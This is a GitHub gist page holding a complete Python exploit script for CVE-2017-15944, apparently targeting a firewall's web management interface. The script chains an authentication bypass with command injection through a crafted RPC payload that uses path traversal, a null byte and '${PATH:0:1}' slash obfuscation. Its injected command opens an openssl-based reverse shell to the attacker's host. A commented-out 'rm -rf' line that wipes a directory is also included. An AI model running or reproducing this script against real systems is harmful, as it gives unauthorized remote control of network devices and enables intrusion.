Skip to content

Instantly share code, notes, and snippets.

@milo2012
Last active July 19, 2021 14:26
Show Gist options
  • Save milo2012/708c062d1943ed7850705cd066bc37f8 to your computer and use it in GitHub Desktop.
Save milo2012/708c062d1943ed7850705cd066bc37f8 to your computer and use it in GitHub Desktop.
CVE-2017-15944_2.py
#!/usr/bin/env python
# encoding: utf-8
import requests
import sys
import base64
import time
requests.packages.urllib3.disable_warnings()
session = requests.Session()
path = "/opt/var.cp/cores"
def step3_exp(command):
exp_post = "{\"action\":\"PanDirect\",\"method\":\"execute\",\"data\":[\"07c5807d0d927dcd0980f86024e5208b\",\"Administrator.get\",{\"changeMyPassword\":true,\"template\":\"asd\",\"id\":\"admin']\\\" async-mode='yes' refresh='yes' cookie='../../../../../.."+path+"/$("+command+").core ;'/>\\u0000\"}],\"type\":\"rpc\",\"tid\":713}"
return exp_post
def exploit(target, port, localip, lport1, lport2):
step2_url = 'https://{}:{}/esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337";'.format(target, port)
step3_url = 'https://{}:{}/php/utils/router.php/Administrator.get'.format(target, port)
commandList=[]
commandList.append("openssl s_client -quiet -connect "+localip+":"+lport1+" | /bin/bash | openssl s_client -quiet -connect "+localip+":"+lport2)
#commandList.append("rm -rf "+path+"/*")
try:
if session.get(step2_url, verify=False).status_code == 200:
print(step3_url)
for command in commandList:
print(command)
command = command.replace("/","${PATH:0:1}")
exp_post = step3_exp(command)
rce = session.post(step3_url, data=exp_post, verify=False).json()
print(rce)
if rce['result']['@status'] == 'success':
print('[+] Success, please wait ... ')
print('[+] JobID: {}'.format(rce['result']['result']['job']))
else:
exit('[!] Fail')
else:
exit('[!] Bypass fail')
except Exception as err:
print(err)
if __name__ == '__main__':
if len(sys.argv) <= 6:
exploit(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4], sys.argv[5])
else:
exit('[+] Usage: python CVE_2017_15944.py IP RPORT LOCALIP LPORT1 LPORT2')
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment